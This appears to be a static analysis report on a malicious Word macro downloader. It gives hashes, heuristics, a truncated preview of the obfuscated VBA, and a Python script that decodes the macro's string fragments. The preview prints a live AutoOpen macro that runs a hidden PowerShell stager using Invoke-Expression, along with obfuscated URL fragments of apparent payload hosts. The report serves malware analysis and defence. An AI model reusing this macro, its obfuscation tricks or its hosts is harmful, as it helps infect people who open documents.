Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c52f09e474c5d9b3…

MALICIOUS

Office (OLE)

Size: 202.5 KB
Created: 2017-12-14 06:34:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: e8d9eb977ec98e7616ac0a358d1a44b3
SHA-1: f9b475cff7f059645c511ffb0d5335db81fe590a
SHA-256: c52f09e474c5d9b316e0b8e5e839282e52268a79b03bef1cefaaee4c2cec793e
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution
(T1203 is listed by the analysis engine, but none of the findings below involves a parser or rendering exploit: the only execution path visible in this sample is the AutoOpen VBA macro, and the WordBasic marker finding itself states that it is not CVE attribution.)

The sample is a Word document whose VBA project contains an AutoOpen procedure, so the code runs as soon as the document is opened with macros enabled. AutoOpen fills several variables with concatenated junk strings and then calls VBA.Shell$ with the return value of the function TTjVYaz, window style 0 (hidden). TTjVYaz assembles its result from Mid() calls that cut the useful substring out of longer junk-padded literals. The visible fragments contain PowerShell -replace operations that map placeholder tokens back to characters (Lsf to the quote [CHAR]39, mJq to the dollar sign [CHAR]36, and the token spelled as [CHAR]111+[CHAR]56+[CHAR]122, i.e. o8z, to the pipe [CHAR]124), the index expression $env:PUBLIC[13]+$env:PUBLIC[5]+'X', which spells ieX (Invoke-Expression) when PUBLIC has its default value C:\Users\Public, and pieces of HTTP URLs. Together with the ClamAV signature Img.Dropper.PhishingLure-6443153-0 this points to a macro downloader that launches a PowerShell stager to fetch and execute a second-stage payload. The download URLs themselves are split across the obfuscated fragments and the preview is truncated, so they are not reconstructed in this report.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(); in this sample the call is VBA.Shell$ TTjVYaz, 0 inside AutoOpen, i.e. it launches the command returned by TTjVYaz() in a hidden window (window style 0).
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This check catches p-code-only or source-extraction-failure macro documents where visible source is unavailable; here it corroborates the decoded source.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so this marker adds nothing beyond OLE_VBA_AUTOOPEN.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Word writes into its own files, not a download location. The URLs the macro contacts are split across obfuscated string fragments inside TTjVYaz() and are therefore not listed here.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78925 bytes
SHA-256: e50a6ce6d87c8c0c18314894ddff7b05fe35a7b74decd6ff3ddc11254ccf9779

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LuvOKlM"
Sub AutoOpen()
KkfdMoLWIEdsLT = "MOGuMmY" + "AsMuwRRpLVPD" + "iirJaKETvp" + "bioAdYwJmDfkAu" + "FrPSXvPfi" + "PlmcTNECMSPc" + "LnWFRRwtq" + "NEMDdSDLC" + "POnMhSq" + "hnbzcaDfApw" + "kqYVYXGJb" + "JGNWAzzKYwbX"
DnQclAwS = "NoVZpRnJL" + "AziVjFaGfpQA" + "NfViIvVJdRus" + "AbIiXPmvWN" + "RjWLtTdzNC" + "tUiiNqWX" + "jcLEwzwRBNqq" + "vRcYJPKnz" + "VshnAtBwYzj" + "oUSNwWLvzLScY" + "BphHNtlwq" + "QKvYARSq"
GcIGwTnbCjJZ = "PkrMPQm" + "DrdFwmbnvitcq" + "otiknZRjQ" + "mKuLjoCBDzCk" + "AzhLnGzQzOz" + "wdidMWTbwTmrPH" + "jrYtPDOi" + "GNdcTRpvzPhK" + "YqbiJhhMqv" + "zRYZVhsjvsW" + "sqHfdqtAZwIShR" + "thAYPSzdCsP"
QWzPfBrjsB = "DWzvGDI" + "rDBzCuT" + "jvNFnNQd" + "bjdQpiorfwC" + "WqZtmYWPX" + "VLuKniwOpFTRiW" + "pBVMHXwQnKE" + "MApuOGjLRViuJ" + "QGzzELDOzWACPX" + "uHAjrkOzKF" + "wLNTXaDM" + "rToFtkzD"
VBA.Shell$ TTjVYaz, 0
tLqJoWOiLS = "BGnttNrA" + "zawDPfbSupG" + "LjQuVpXqEsOk" + "FkjvMfs" + "YUTMmtIvwjVLYq" + "WzYXUKZGMNC" + "vvWiKOpm" + "zhiwOvHJ" + "ZcPJJwoHYmwOG" + "kiMzaBLziDOZSq" + "FOSzToaullZ" + "CqDnzqizNCvhIj"
tLvkizjSXjQ = "KKoaNAGJHfQQi" + "sODTkpmMjjqB" + "wWXfGhDXnZbhhB" + "VNuiBuFROD" + "bAwdEjMFKnjzJj" + "MFpcmDnPqSo" + "AArEJcKF" + "YJUrVcr" + "mOlvViAcmRto" + "HKQYLESiZXzi" + "nvUkQbwfEED" + "fSqbWKRRR"
zDTJXYBMr = "RsuEHBARsGDG" + "HjmbHDMiM" + "WwRRHDXd" + "MRwmXmUVKzYKN" + "qLdkwuJiDEjYI" + "jtOUcKtvJtPpn" + "CjoBIDaGdSaj" + "iOuGwddlQkEi" + "zuCjVHG" + "bUQiPFQdPvu" + "bLhOmQMJwlwkS" + "EjDuzTc"
End Sub
Function TTjVYaz()
jipbRcrBG = "VLzKCzIp" + "fEvYCkvmNW" + "IUAXsZhihN" + "uYwErQFETIAK" + "CoiGrfzrZNC" + "KbSdPdH" + "wJXbwtfh" + "DOIKZUDq" + "nCOpVKuDjom" + "DisDdtRHIwA" + "jWzuqkHOm" + "pFsIoMhvMqujz" + "PHwbmjSpBzGw"
VMzvDTQdG = "GNFNmPHhBpE" + "viiwzXMPVCHu" + "SdIBVYlIZo" + "laruUzJDDRmqId" + "kzXJDGLrT" + "zjjQTcWtoLYj" + "uWtDrEjnz" + "BonlPloZiX" + "VTdnjoPz" + "RuEjcnKCUm" + "wzHicjrHIzmqI" + "ZCPQHQQp" + "GHkGJcalEvk"
IwXBpfU = Mid("b7LE8bjLsf+Lsfbc.ToString(BRMlkDTNUAWjpCswIm", 8, 19)
lfREUPKcM = "zNvjXpOo" + "KUEFaNlJWCWQ" + "iojcCWADvCp" + "hhQKXrl" + "cwcWhJFDsaDcvU" + "HAvmrojPRPE" + "fVzzLlWCmMJut" + "zLUzNFNDJ" + "bEuFtjKG" + "RZhtarrYSrv" + "BtaqXvSCwfcMq" + "HrQIGBCRbr" + "RuHWjuLNS"
bhBtdRPhs = "qECZMdcXYcVuSF" + "wrPJAfirDkEWbF" + "AEiIiwOCa" + "QipMSNi" + "lLQXMdT" + "MwoHHBRK" + "QMJawkpoHjw" + "fkWZSpuzcsEpW" + "PNSvPQilBBVc" + "bbiFtWOhORioL" + "NwYHUEOVbW" + "UjOtiVDq" + "SWunLSH"
lpTHTzYin = "KUOVlsEilzV" + "CjzIJlt" + "jSibFAKfRkQwY" + "zXBmUJwnpttOrY" + "YkaUdqslnQ" + "hYMBjXfEmcGX" + "jpwcohqJm" + "tzqduHFl" + "WkbZaoNWj" + "ltRNJkotQzFZb" + "PTBqtlwhrsBfHQ" + "nbLHVAQbmj" + "GNpoIwJjKHmWd"
scQjcwRbB = Mid("Buv0szsMiCQpiHzjSbD2jXk+LsfxLsf)') -crEpLacE  'Lsf',[CHAR]39  -RepLace  'mJq',[CHAR]36 -RepLace  ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')Oju", 24, 155)
JjIICSKEfrA = "BwjHDsR" + "dtBYYGzMtZqA" + "fwiwJEqEkwBwM" + "fmEQnwHFbC" + "dMWhtlcHO" + "zFJunahszz" + "LmUZoICDfZU" + "ffsUWrKZpzw" + "hvVzWZMiCqR" + "BIFcZEividd" + "vGKBmamNn" + "stnDhFMqZpNRS" + "lizlPCAES"
dkCtbwi = "rdLfFsUQzuD" + "lqQLtqjwCGtmJv" + "FXFwtFzNmjEn" + "VQCVKdqTEdcGuD" + "kkZWKIPtrvJ" + "ndiioDjdlEYcfE" + "AucswCXdC" + "icoFXKZA" + "CqawnDLZofMz" + "GsOzODKrQzbWG" + "uXOuwbvBZav" + "pncizqKsWvrXv" + "qslqzbhcQC"
CrrnzTKQLmT = "EPOLrcE" + "mMQMpWW" + "ioDnCdnwPEa" + "wlpnajw" + "qBzzkJiGw" + "sdOmTMAiEa" + "SwmBDFBWclJ" + "FlhoGDszjz" + "MwmMRdmvcYpYF" + "vhEdjWoj" + "JAmXubL" + "vUGaEQsjtpp" + "zPNccKVoVwbB"
UImbicO = Mid("cr+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhDhjHJNc6b6dajF", 3, 158)
hYRSAor = "lNVuEToDZO" + "PiCkMOEwfq" + "clDQiaUHMXaILd" + "zScDUVHTdDoOP" + "YRWinlkro" + "NjSCzoZqHXQm" + "cWcVSZMuMF" + "oGEZYsE
... (truncated)
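The fragments visible in TTjVYaz() can be checked without ever opening the document. The script below is an added example written for this page; it is not part of the analysis engine or of oletools. It emulates the two VBA idioms the macro relies on ("literal" + "literal" concatenation and Mid() with its 1-based start), runs them over an excerpt copied from the preview above, and then decodes what is visible on the PowerShell side: the -replace table that maps the placeholder tokens back to the quote, dollar and pipe characters, and the $env:PUBLIC[13]+$env:PUBLIC[5]+'X' indexing trick. Assumptions: MACRO_EXCERPT holds only lines shown on this page (junk-only assignments between them were left out), PUBLIC is taken to have its default value C:\Users\Public, and the LPh token that still appears in the URL fragment is left untouched because its replacement is not in the visible part of the macro.

```python
import re

# Excerpt of macros.bas copied from the preview on this page (junk-only
# assignments between the interesting lines are omitted).
MACRO_EXCERPT = r'''
Sub AutoOpen()
KkfdMoLWIEdsLT = "MOGuMmY" + "AsMuwRRpLVPD" + "iirJaKETvp" + "bioAdYwJmDfkAu" + "FrPSXvPfi" + "PlmcTNECMSPc" + "LnWFRRwtq" + "NEMDdSDLC" + "POnMhSq" + "hnbzcaDfApw" + "kqYVYXGJb" + "JGNWAzzKYwbX"
VBA.Shell$ TTjVYaz, 0
End Sub
Function TTjVYaz()
jipbRcrBG = "VLzKCzIp" + "fEvYCkvmNW" + "IUAXsZhihN" + "uYwErQFETIAK" + "CoiGrfzrZNC" + "KbSdPdH" + "wJXbwtfh" + "DOIKZUDq" + "nCOpVKuDjom" + "DisDdtRHIwA" + "jWzuqkHOm" + "pFsIoMhvMqujz" + "PHwbmjSpBzGw"
IwXBpfU = Mid("b7LE8bjLsf+Lsfbc.ToString(BRMlkDTNUAWjpCswIm", 8, 19)
scQjcwRbB = Mid("Buv0szsMiCQpiHzjSbD2jXk+LsfxLsf)') -crEpLacE  'Lsf',[CHAR]39  -RepLace  'mJq',[CHAR]36 -RepLace  ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')Oju", 24, 155)
UImbicO = Mid("cr+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhDhjHJNc6b6dajF", 3, 158)
End Function
'''

STR_LIT = r'"((?:[^"]|"")*)"'                       # VBA literal, "" escapes a quote
MID_RE = re.compile(r'\bMid\$?\(\s*' + STR_LIT + r'\s*,\s*(\d+)\s*(?:,\s*(\d+))?\s*\)', re.I)
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
PROC_RE = re.compile(r'^\s*(?:Sub|Function)\s+(\w+)', re.I)
SHELL_RE = re.compile(r'\bShell\$?\s+([A-Za-z_]\w*)', re.I)


def vba_mid(s, start, length=None):
    """VBA Mid(): 1-based start, optional length; a start past the end gives ""."""
    if start < 1:
        raise ValueError("Mid() start must be >= 1")
    tail = s[start - 1:]
    return tail if length is None else tail[:length]


def eval_string_expr(expr):
    """Evaluate "lit" + Mid("lit", n[, m]) + ...; None for anything else (manual review)."""
    def fold_mid(m):
        lit = m.group(1).replace('""', '"')
        out = vba_mid(lit, int(m.group(2)), int(m.group(3)) if m.group(3) else None)
        return '"' + out.replace('"', '""') + '"'
    expr = MID_RE.sub(fold_mid, expr)
    if re.sub(STR_LIT, '', expr).replace('+', '').strip():
        return None
    return ''.join(p.replace('""', '"') for p in re.findall(STR_LIT, expr))


def recover_assignments(source):
    """Map (procedure, variable) -> recovered string for every pure string assignment."""
    env, proc = {}, None
    for line in source.splitlines():
        head = PROC_RE.match(line)
        if head:
            proc = head.group(1)
            continue
        m = ASSIGN_RE.match(line)
        if m:
            val = eval_string_expr(m.group(2))
            if val is not None:
                env[(proc, m.group(1))] = val
    return env


# PowerShell side: 'tok' or ([CHAR]n+[CHAR]m) operands of -replace / -creplace.
PS_ATOM = r"'([^']*)'|\(?((?:\[CHAR\]\d+\+?)+)\)?"
REPLACE_RE = re.compile(r"-c?replace\s+(?:%s)\s*,\s*(?:%s)" % (PS_ATOM, PS_ATOM), re.I)
ENV_IDX_RE = re.compile(r"\$env:(\w+)\[(\d+)\]", re.I)
JOIN_RE = re.compile(r"'\s*\+\s*'")              # 'ab'+'cd' -> 'abcd'
DEFAULT_ENV = {"PUBLIC": r"C:\Users\Public"}     # assumption: default Windows value


def _atom(lit, chars):
    return ''.join(chr(int(n)) for n in re.findall(r'\d+', chars)) if chars else lit


def parse_replace_table(ps):
    """Collect token -> character pairs from the -replace operands."""
    return {_atom(a, b): _atom(c, d) for a, b, c, d in REPLACE_RE.findall(ps)}


def decode_payload_string(s, table):
    """Undo the token substitution and fold string joins. Plain, case-sensitive
    replace is used; the tokens are literal letters, so this matches what
    -replace does apart from its case-insensitivity."""
    for token, ch in table.items():
        s = s.replace(token, ch)
    return JOIN_RE.sub('', s)


def resolve_env_indexing(ps, env=DEFAULT_ENV):
    """Replace $env:NAME[i] with the i-th character of NAME, then fold the joins."""
    ps = ENV_IDX_RE.sub(lambda m: "'" + env[m.group(1).upper()][int(m.group(2))] + "'", ps)
    return JOIN_RE.sub('', ps)


def analyse(source=MACRO_EXCERPT, env=DEFAULT_ENV):
    """Find what Shell$ runs and decode the fragments that build that command."""
    strings = recover_assignments(source)
    target = SHELL_RE.findall(source)[0]
    fragments = [v for (proc, _), v in strings.items() if proc == target]
    outer = next(f for f in fragments if '-replace' in f.lower())
    table = parse_replace_table(outer)
    return {
        'shell_target': target,
        'replace_table': table,
        'launcher': resolve_env_indexing(outer, env),
        'decoded_fragments': [decode_payload_string(f, table) for f in fragments if f is not outer],
    }


if __name__ == '__main__':
    for key, value in analyse().items():
        print(key, value)
```

The host names in the decoded URL fragment stay partial because the preview is truncated and the LPh token is unresolved; take them from a complete olevba dump of macros.bas rather than from this excerpt. The same evaluator works on other macros of this style as long as their string building uses only literals, + and Mid(); any other construct makes eval_string_expr() return None so it is not silently mis-decoded.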